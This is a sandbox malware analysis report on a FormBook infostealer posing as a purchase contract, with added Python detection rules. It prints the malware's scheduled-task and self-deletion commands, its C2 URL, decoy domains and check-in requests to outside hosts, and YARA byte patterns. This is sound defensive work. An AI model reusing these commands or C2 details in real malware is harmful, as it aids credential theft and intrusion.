Windows Analysis Report: Purchase contract #9009.exe

Overview

General Information

Sample Name: Purchase contract #9009.exe
Analysis ID: 458959
MD5: acff75235867dd82b2679b4afd3ad525
SHA1: 072839587fc2c193afd5963c467502be89815c2a
SHA256: 84f6beeecfc24544df0a59c7b7f0961c44d835f95f23289dac5730decc2d4957
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • Purchase contract #9009.exe (PID: 6948 cmdline: 'C:\Users\user\Desktop\Purchase contract #9009.exe' MD5: ACFF75235867DD82B2679B4AFD3AD525)
    • schtasks.exe (PID: 7128 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' /XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MSBuild.exe (PID: 3844 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 1572 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 4112 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
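
The process tree above is the chain a detection engineer wants to catch: the sample registers a scheduled task from an XML file in the user's Temp directory, starts the legitimate MSBuild.exe with no arguments as a hollowing host (the Sigma hit "Possible Applocker Bypass" further down is the same event), injects into explorer.exe, and finally has the 32-bit SysWOW64 explorer.exe run cmd.exe /c del against the hollowed host binary. The Python below is an added example and is not part of the Joe Sandbox report. It replays constructed process-creation events modelled on this tree (PIDs, images and command lines as listed; parent links follow the tree as the report draws it, where injection targets appear as children) through four rules and prints the hits. The cmd.exe image path, the benign MSBuild control event, and the .NET utility names other than MSBuild.exe in DOTNET_LOLBIN are my assumptions, not something the report shows.

```python
"""Detection rules for the process chain in this report, run over constructed
process-creation events (Sysmon Event ID 1 style fields)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's process tree. Parent links follow the tree as
# drawn (injection targets appear as children). The cmd.exe image path and the
# last, benign MSBuild event are assumptions added for illustration.
EVENTS = [
    ProcEvent(6948, 1000, r"C:\Users\user\Desktop\Purchase contract #9009.exe",
              r"'C:\Users\user\Desktop\Purchase contract #9009.exe'"),
    ProcEvent(7128, 6948, r"C:\Windows\System32\schtasks.exe",
              r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nzRFOjxWpomfsw' "
              r"/XML 'C:\Users\user\AppData\Local\Temp\tmpC4FD.tmp'"),
    ProcEvent(7136, 7128, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(3844, 6948, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"),
    ProcEvent(3424, 3844, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(1572, 3424, r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe"),
    ProcEvent(4112, 1572, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'"),
    ProcEvent(5000, 4999, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe App.csproj /t:Build"),
]

USER_WRITABLE = re.compile(r"^[a-z]:\\users\\", re.I)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
# MSBuild.exe is what the report shows; the other names generalise to sibling
# .NET Framework utilities and are my assumption.
DOTNET_LOLBIN = re.compile(
    r"\\microsoft\.net\\framework(64)?\\v[\d.]+\\(msbuild|installutil|regsvcs|regasm)\.exe$", re.I)
DEL_WINDOWS = re.compile(r"/c\s+del\s+['\"]?([a-z]:\\windows\\[^'\"]+)", re.I)


def _name(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_schtasks_xml_from_temp(ev, parent):
    """schtasks /Create ... /XML pointing into the user's Temp directory,
    spawned by a process running from a user-writable path."""
    if _name(ev.image) != "schtasks.exe" or parent is None:
        return False
    c = ev.cmdline.lower()
    return ("/create" in c and "/xml" in c and bool(TEMP_DIR.search(c))
            and bool(USER_WRITABLE.match(parent.image)))


def rule_dotnet_lolbin_no_args(ev, parent):
    """A .NET Framework utility started with no arguments by a process from a
    user-writable path: a build tool with nothing to build is a hollowing host."""
    if not DOTNET_LOLBIN.search(ev.image) or parent is None:
        return False
    no_args = ev.cmdline.strip().strip("'\"").lower() == ev.image.lower()
    return no_args and bool(USER_WRITABLE.match(parent.image))


def rule_cmd_del_windows_binary(ev, parent):
    """cmd.exe /c del against a file under the Windows directory (self-removal
    of the hollowed host, as in the report)."""
    return _name(ev.image) == "cmd.exe" and DEL_WINDOWS.search(ev.cmdline) is not None


def rule_wow64_explorer_spawns_shell(ev, parent):
    r"""Command shell whose parent is the 32-bit explorer.exe. On x64 the
    desktop shell is C:\Windows\explorer.exe, so a SysWOW64 copy spawning a
    shell is the injected process from the report."""
    return (parent is not None
            and parent.image.lower() == r"c:\windows\syswow64\explorer.exe"
            and _name(ev.image) in ("cmd.exe", "powershell.exe"))


RULES = {
    "schtasks_xml_from_temp": rule_schtasks_xml_from_temp,
    "dotnet_lolbin_no_args": rule_dotnet_lolbin_no_args,
    "cmd_del_windows_binary": rule_cmd_del_windows_binary,
    "wow64_explorer_spawns_shell": rule_wow64_explorer_spawns_shell,
}


def detect(events):
    """Return (rule_name, pid) for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        for name, rule in RULES.items():
            if rule(ev, parent):
                hits.append((name, ev.pid))
    return hits


if __name__ == "__main__":
    for name, pid in detect(EVENTS):
        print(f"{name:30} pid={pid}")
```

The rules key on parent context rather than on file hashes: the same chain would trip them with a differently named dropper, a different task name, or a different temp file, while the benign MSBuild invocation with a project file and no user-path parent stays silent.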

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.narrowpathwc.com/n8ba/"], "decoy": ["thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com", "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com", "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com", "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com", "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz", "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net", "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com", "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com", "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services", "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com", "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net", "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com", "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com", "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15 further entries omitted.

Note on the matched strings: $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) disassembles to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the timing probe behind "Tries to detect virtualization through RDTSC time measurements" in the signature list. The JPCERT/CC strings (68 xx xx xx xx) are push imm32 instructions; the rule names each one after the sqlite3 function it stands for.

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.MSBuild.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.MSBuild.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.MSBuild.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
4.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.MSBuild.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1 further entry omitted.

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started; Author: juju4; Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentCommandLine: 'C:\Users\user\Desktop\Purchase contract #9009.exe', ParentImage: C:\Users\user\Desktop\Purchase contract #9009.exe, ParentProcessId: 6948, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 3844

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (the C2 and decoy lists are given in full under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe; ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: Purchase contract #9009.exe; Virustotal: Detection: 25%
Source: Purchase contract #9009.exe; ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match; File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe; Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Purchase contract #9009.exe; Joe Sandbox ML: detected
Source: 4.2.MSBuild.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: Purchase contract #9009.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Purchase contract #9009.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: explorer.pdbUGP; source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP; source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb; source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP; source: MSBuild.exe, 00000004.00000002.717581490.000000000169F000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.905256355.0000000004BEF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: MSBuild.exe, explorer.exe
Source: Binary string: explorer.pdb; source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD; source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb; source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 4x nop then pop esi; 4_2_00415806
Source: C:\Windows\SysWOW64\explorer.exe; Code function: 4x nop then pop esi; 9_2_02EB5806

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.narrowpathwc.com/n8ba/
Source: global traffic; HTTP traffic detected: GET /n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhN HTTP/1.1 | Host: www.narrowpathwc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven null bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhN HTTP/1.1 | Host: www.braun-mathematik.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven null bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhN HTTP/1.1 | Host: www.lifestylebykendra.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven null bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /n8ba/?3fu=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&j8DLQj=lVUPCP0PhN HTTP/1.1 | Host: www.teamtacozzzz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven null bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhN HTTP/1.1 | Host: www.ascope.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven null bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN HTTP/1.1 | Host: www.5fashionfix.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven null bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhN HTTP/1.1 | Host: www.mtsnurulislamsby.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven null bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhN HTTP/1.1 | Host: www.wintonplaceoh.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven null bytes, nothing printable)
Source: global traffic; HTTP traffic detected: GET /n8ba/?3fu=xPi5BDAvQynHSVlVR/YHv5A7cLya1z2oKdj6PcHoa0/Qm6A62p0xrLdBVFxzQSXilAdH&j8DLQj=lVUPCP0PhN HTTP/1.1 | Host: www.backtothesimplethings.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven null bytes, nothing printable)
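
The check-in pattern is visible in the extracted configuration above and in the requests just listed: the same URI path /n8ba/ goes to the real C2 and to a rotating set of configured decoy domains, each request carries no User-Agent and Connection: close, and one query parameter (j8DLQj=lVUPCP0PhN) does not change between hosts while the other does. The Python below is an added example and is not part of the Joe Sandbox report. It parses the nine requests (reassembled here as raw HTTP from the report's lines), groups them by path to expose the fan-out, reports the constant parameter and the missing User-Agent, and buckets the Host values against the extracted configuration to separate the single C2 from the decoys. The parser and the threshold of three distinct hosts are my choices.

```python
"""Parse the FormBook check-in requests from this report and flag the fan-out
pattern: one URI path requested from many unrelated hosts, no User-Agent."""
from collections import defaultdict

# Constructed from the nine GET requests in the report (headers reassembled).
RAW_REQUESTS = [
    "GET /n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhN HTTP/1.1\r\nHost: www.narrowpathwc.com\r\nConnection: close\r\n\r\n",
    "GET /n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhN HTTP/1.1\r\nHost: www.braun-mathematik.online\r\nConnection: close\r\n\r\n",
    "GET /n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhN HTTP/1.1\r\nHost: www.lifestylebykendra.com\r\nConnection: close\r\n\r\n",
    "GET /n8ba/?3fu=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&j8DLQj=lVUPCP0PhN HTTP/1.1\r\nHost: www.teamtacozzzz.com\r\nConnection: close\r\n\r\n",
    "GET /n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhN HTTP/1.1\r\nHost: www.ascope.club\r\nConnection: close\r\n\r\n",
    "GET /n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN HTTP/1.1\r\nHost: www.5fashionfix.net\r\nConnection: close\r\n\r\n",
    "GET /n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhN HTTP/1.1\r\nHost: www.mtsnurulislamsby.com\r\nConnection: close\r\n\r\n",
    "GET /n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhN HTTP/1.1\r\nHost: www.wintonplaceoh.com\r\nConnection: close\r\n\r\n",
    "GET /n8ba/?3fu=xPi5BDAvQynHSVlVR/YHv5A7cLya1z2oKdj6PcHoa0/Qm6A62p0xrLdBVFxzQSXilAdH&j8DLQj=lVUPCP0PhN HTTP/1.1\r\nHost: www.backtothesimplethings.com\r\nConnection: close\r\n\r\n",
]

# The configuration extracted by the sandbox, copied from the report.
CONFIG = {
    "C2 list": ["www.narrowpathwc.com/n8ba/"],
    "decoy": [
        "thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com",
        "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com",
        "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com",
        "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com",
        "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz",
        "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net",
        "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com",
        "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com",
        "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services",
        "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com",
        "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net",
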